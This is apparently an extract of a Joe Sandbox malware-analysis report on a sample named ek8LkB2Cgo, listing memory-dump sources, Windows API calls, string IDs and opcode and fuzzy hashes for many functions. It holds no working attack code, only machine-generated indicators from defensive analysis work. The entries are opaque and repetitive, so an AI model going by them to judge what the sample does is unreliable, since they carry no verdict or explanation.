                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                  • String ID: LPT
                                                                                  • API String ID: 3222508074-1350329615
                                                                                  • Opcode ID: 2737f84cd54d668d618ebed681942d47fc6c9e64c56bf6a14cc9521e3d98b226
                                                                                  • Instruction ID: 8290d421ac7ec20fd8ddb3a6cbc3a4f274de0f981fdbfd4f07d37c44d57d7f6b
                                                                                  • Opcode Fuzzy Hash: 2737f84cd54d668d618ebed681942d47fc6c9e64c56bf6a14cc9521e3d98b226
                                                                                  • Instruction Fuzzy Hash: BB619275A00219AFCB18DF98C896EBEBBF5FF48710F01405AF946AB291D770AE40CB54
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscpy
                                                                                  • String ID: I/V$I/V
                                                                                  • API String ID: 3048848545-3445170390
                                                                                  • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                                  • Instruction ID: f1e79e76aa2f16e9ea5fc6dede700fef3445cbf367ca4f07618b09e57ed5d98d
                                                                                  • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                                  • Instruction Fuzzy Hash: A641F436900A1AABCF25EF99D441AFCBFB0FF48714F50505BE981A7191DB706E82C7A4
                                                                                  APIs
                                                                                  • Sleep.KERNEL32(00000000), ref: 0050BCDA
                                                                                  • GlobalMemoryStatusEx.KERNEL32 ref: 0050BCF3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                  • String ID: @
                                                                                  • API String ID: 2783356886-2766056989
                                                                                  • Opcode ID: 40601ce6a844f9bc6dfc183bf0f55e0f2264817b95a711f71a1b8b0a6b2d2fe3
                                                                                  • Instruction ID: b2f18f14f666c305484b9c969dfbd7db101c9b85f73c1526248a1cbb01266985
                                                                                  • Opcode Fuzzy Hash: 40601ce6a844f9bc6dfc183bf0f55e0f2264817b95a711f71a1b8b0a6b2d2fe3
                                                                                  • Instruction Fuzzy Hash: 04511571408745ABE320AF54D88ABAFBBE8FBD5354F414C4DF1C8420A6DF7089AC9B56
                                                                                  APIs
                                                                                    • Part of subcall function 004F44ED: __fread_nolock.LIBCMT ref: 004F450B
                                                                                  • _wcscmp.LIBCMT ref: 0053C65D
                                                                                  • _wcscmp.LIBCMT ref: 0053C670
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscmp$__fread_nolock
                                                                                  • String ID: FILE
                                                                                  • API String ID: 4029003684-3121273764
                                                                                  • Opcode ID: fb55e87e42b9f2329ed5a09fc137c86eeb73bb2ff377bbff97f5172e2b8c6250
                                                                                  • Instruction ID: 4f017300bcff1b042a9486dedcc17010f746efd86112ab924b072d3a3bff56a4
                                                                                  • Opcode Fuzzy Hash: fb55e87e42b9f2329ed5a09fc137c86eeb73bb2ff377bbff97f5172e2b8c6250
                                                                                  • Instruction Fuzzy Hash: 7441D972A0021A7BDF209BA4DC46FEF7FB9AF89714F00046AF605F7181DA759A04CB55
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 0055A85A
                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0055A86F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: '
                                                                                  • API String ID: 3850602802-1997036262
                                                                                  • Opcode ID: 0663cedc554b06af16553d18b9574736eddb44ff6e92cb0183a03679b3ce032c
                                                                                  • Instruction ID: 91bf2ecd4cc879234f30a3a54c18a8ffc01c9888105541f031a712fd5de4d044
                                                                                  • Opcode Fuzzy Hash: 0663cedc554b06af16553d18b9574736eddb44ff6e92cb0183a03679b3ce032c
                                                                                  • Instruction Fuzzy Hash: E741E674E012099FDB54CFA8D891BEA7BB9FF08305F14016AED05AB341D770A94ADFA1
                                                                                  APIs
                                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 0055980E
                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0055984A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$DestroyMove
                                                                                  • String ID: static
                                                                                  • API String ID: 2139405536-2160076837
                                                                                  • Opcode ID: 899d0fe7b6054810fb7145f5ac550bfe381f5a6ba2eea8651fad03e9e587b10e
                                                                                  • Instruction ID: bd70a1a769c0c70f4862e1600077b663b03580c1ef8e92cc1ed239eae9e93c7a
                                                                                  • Opcode Fuzzy Hash: 899d0fe7b6054810fb7145f5ac550bfe381f5a6ba2eea8651fad03e9e587b10e
                                                                                  • Instruction Fuzzy Hash: B8319E71110604AAEB109F74CC91BFB7BB9FF99761F00861AF8A9C7190CA34AC89D760
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 005351C6
                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00535201
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoItemMenu_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 2223754486-4108050209
                                                                                  • Opcode ID: 4d9d6a4c5056cc92368d31e0a3ebec88cd185e6fe4101385a28134af597acf91
                                                                                  • Instruction ID: 3aca91fd5293acb0e05925f22c75852136559331aee77d9b78594896061eb02c
                                                                                  • Opcode Fuzzy Hash: 4d9d6a4c5056cc92368d31e0a3ebec88cd185e6fe4101385a28134af597acf91
                                                                                  • Instruction Fuzzy Hash: 8C31E4396007059BEB24CF99D849BAFBFF5FF85350F141419F985A61A0F7709A44CB50
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: __snwprintf
                                                                                  • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                  • API String ID: 2391506597-2584243854
                                                                                  • Opcode ID: 4a29bfc5098eda3c05c72220262a763ef4a8633d56619a0327ae593a7f62bf3c
                                                                                  • Instruction ID: bf2b67c53c0d521062d8e26882a7295cfc31b6007fac5fbce48aa6359ce96058
                                                                                  • Opcode Fuzzy Hash: 4a29bfc5098eda3c05c72220262a763ef4a8633d56619a0327ae593a7f62bf3c
                                                                                  • Instruction Fuzzy Hash: D1219331A00119AFCF10EF65D982FED7BB5BF46348F01046AF605AB181DB74EA45CBA6
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0055945C
                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00559467
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: Combobox
                                                                                  • API String ID: 3850602802-2096851135
                                                                                  • Opcode ID: 12ca9faf92e28188e1679ed2f01f72cb8fc46e39fd01869f06509f8d1257eca4
                                                                                  • Instruction ID: cb77cef3ec463b5cb618309fcc96e3c7391f8f0f464597f843ea98e84792f789
                                                                                  • Opcode Fuzzy Hash: 12ca9faf92e28188e1679ed2f01f72cb8fc46e39fd01869f06509f8d1257eca4
                                                                                  • Instruction Fuzzy Hash: 8C11D0B1200208EFEF119F54DC90EBB3B6EFB883A5F100126FD189B290D6359C569760
                                                                                  APIs
                                                                                    • Part of subcall function 0050B34E: GetWindowLongW.USER32(?,000000EB), ref: 0050B35F
                                                                                  • GetActiveWindow.USER32 ref: 0055DA7B
                                                                                  • EnumChildWindows.USER32(?,0055D75F,00000000), ref: 0055DAF5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ActiveChildEnumLongWindows
                                                                                  • String ID: T1T
                                                                                  • API String ID: 3814560230-1051708705
                                                                                  • Opcode ID: 871f964b205f2a3655c8417b9043a644ece18bd1cbaafe47a7daad784ff2ad36
                                                                                  • Instruction ID: 84da9c937e362df271df881139cd19f0b75546649272d3761f16625e64aad606
                                                                                  • Opcode Fuzzy Hash: 871f964b205f2a3655c8417b9043a644ece18bd1cbaafe47a7daad784ff2ad36
                                                                                  • Instruction Fuzzy Hash: 74215C36204601DFC764DF68D860AA67BF5FF99321F65061AE86A873E0D730B844DF64
                                                                                  APIs
                                                                                    • Part of subcall function 0050D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0050D1BA
                                                                                    • Part of subcall function 0050D17C: GetStockObject.GDI32(00000011), ref: 0050D1CE
                                                                                    • Part of subcall function 0050D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0050D1D8
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00559968
                                                                                  • GetSysColor.USER32(00000012), ref: 00559982
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                  • String ID: static
                                                                                  • API String ID: 1983116058-2160076837
                                                                                  • Opcode ID: ff813e26220f73f2683b9d40bb219c9780e37f56c00a4fdb0159494289273eb3
                                                                                  • Instruction ID: 225fe748c48f244b453a1a4cc51038f566ee842aa2275f70dbf31accede5aaea
                                                                                  • Opcode Fuzzy Hash: ff813e26220f73f2683b9d40bb219c9780e37f56c00a4fdb0159494289273eb3
                                                                                  • Instruction Fuzzy Hash: 9911267252020AAFDB04DFB8CC45AEA7BB8FF48355F014629FD55E2250E738E854DB60
                                                                                  APIs
                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 00559699
                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 005596A8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: LengthMessageSendTextWindow
                                                                                  • String ID: edit
                                                                                  • API String ID: 2978978980-2167791130
                                                                                  • Opcode ID: ecfae7af55b118516da72d5cd8fabe433c1d57d2dbdbc29c6455edc078c7db54
                                                                                  • Instruction ID: c70b951671e7c2f7f287f57c8947a3217299547164fea79be94bb16737a0db83
                                                                                  • Opcode Fuzzy Hash: ecfae7af55b118516da72d5cd8fabe433c1d57d2dbdbc29c6455edc078c7db54
                                                                                  • Instruction Fuzzy Hash: EB118871100109EAEB105EA4ECA4AAB3B6AFB153A9F500716FD25971E0C7399C58ABA0
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 005352D5
                                                                                  • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 005352F4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoItemMenu_memset
                                                                                  • String ID: 0
                                                                                  • API String ID: 2223754486-4108050209
                                                                                  • Opcode ID: 29d48e4ace42ff323dc5dfd773ceb49b589a158e204d16aeede40c4fa5597be5
                                                                                  • Instruction ID: f42cdc3a954aeeeddb14202b34bd25d2b07f6502b34c3e0653624b1d3939da82
                                                                                  • Opcode Fuzzy Hash: 29d48e4ace42ff323dc5dfd773ceb49b589a158e204d16aeede40c4fa5597be5
                                                                                  • Instruction Fuzzy Hash: 3011EF76901A14ABDF60DFA8D904B9E7FB8BB05790F141125F902E72A0F3B0ED04DBA0
                                                                                  APIs
                                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00544DF5
                                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00544E1E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Internet$OpenOption
                                                                                  • String ID: <local>
                                                                                  • API String ID: 942729171-4266983199
                                                                                  • Opcode ID: 45b96c61ef45509b8d630a2703aebd150de8a79b4887129b15d5210f28bec1d7
                                                                                  • Instruction ID: 2a93d7bbb4400e6f1379db85390e3b11cd156c75b446575d145457e5bbc509e5
                                                                                  • Opcode Fuzzy Hash: 45b96c61ef45509b8d630a2703aebd150de8a79b4887129b15d5210f28bec1d7
                                                                                  • Instruction Fuzzy Hash: 34119A70981221FBDB298F618889FFBFEA8FF16799F10862AF50596140D2705994DAE0
                                                                                  APIs
                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 005237A7
                                                                                  • ___raise_securityfailure.LIBCMT ref: 0052388E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                  • String ID: ([
                                                                                  • API String ID: 3761405300-2148022395
                                                                                  • Opcode ID: a00acbfce1f186affb14c9c272759a880bdaad71f5c5708839580ebca075a1fa
                                                                                  • Instruction ID: f26d8e6cdb0b2a703591799237d5a4f72c01eebfa70c877c47bacb75aad23ef3
                                                                                  • Opcode Fuzzy Hash: a00acbfce1f186affb14c9c272759a880bdaad71f5c5708839580ebca075a1fa
                                                                                  • Instruction Fuzzy Hash: F821E6B5501304DFE781DF15F9866423BB8FB69350F106A2AE5048A3E1E3B4F988EB45
                                                                                  APIs
                                                                                  • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0054A84E
                                                                                  • htons.WSOCK32(00000000,?,00000000), ref: 0054A88B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: htonsinet_addr
                                                                                  • String ID: 255.255.255.255
                                                                                  • API String ID: 3832099526-2422070025
                                                                                  • Opcode ID: 79220393deb2ca4811752e63ea9a5e9a40393817f2ad1c8aa72ed2427eeaa39f
                                                                                  • Instruction ID: 0b191b5adea70b6c7d988e6a8f6ad9c5d06f6d6552671d4baf5662491b656f68
                                                                                  • Opcode Fuzzy Hash: 79220393deb2ca4811752e63ea9a5e9a40393817f2ad1c8aa72ed2427eeaa39f
                                                                                  • Instruction Fuzzy Hash: 08012279200305ABCB119F68D88AFEDBB78FF45318F10842AF516AB2D1C771E8058752
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0052B7EF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 3850602802-1403004172
                                                                                  • Opcode ID: 6dbf684457b7192c1668dc16b82848c1ec3bf5fce658ebfda69d84935c64800e
                                                                                  • Instruction ID: ccdbfa798547e2e551458ec9f705d0d0acabed4bb4bb2d0cccd0c81cb941ae52
                                                                                  • Opcode Fuzzy Hash: 6dbf684457b7192c1668dc16b82848c1ec3bf5fce658ebfda69d84935c64800e
                                                                                  • Instruction Fuzzy Hash: CA014C7160012CAFDB04EBA4EC42DFE3779BF47314B04061DF561632C2DB74580887A4
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 0052B6EB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1317973392.00000000004F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1317954311.00000000004F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000057D000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318061028.000000000059E000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318112515.00000000005AA000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1318137759.00000000005B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4f0000_ek8LkB2Cgo.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 3850602802-1403004172
                                                                                  • Opcode ID: 218c22cfd36b1a65a6e45f313f4dfd4545afd2f89478a6ac68beef308dec7369
                                                                                  • Instruction ID: f60b6bc1bb63679dab303bc548b300cc02df1725d7104943cf1158528f37826c
                                                                                  • Opcode Fuzzy Hash: 218c22cfd36b1a65a6e45f313f4dfd4545afd2f89478a6ac68beef308dec7369
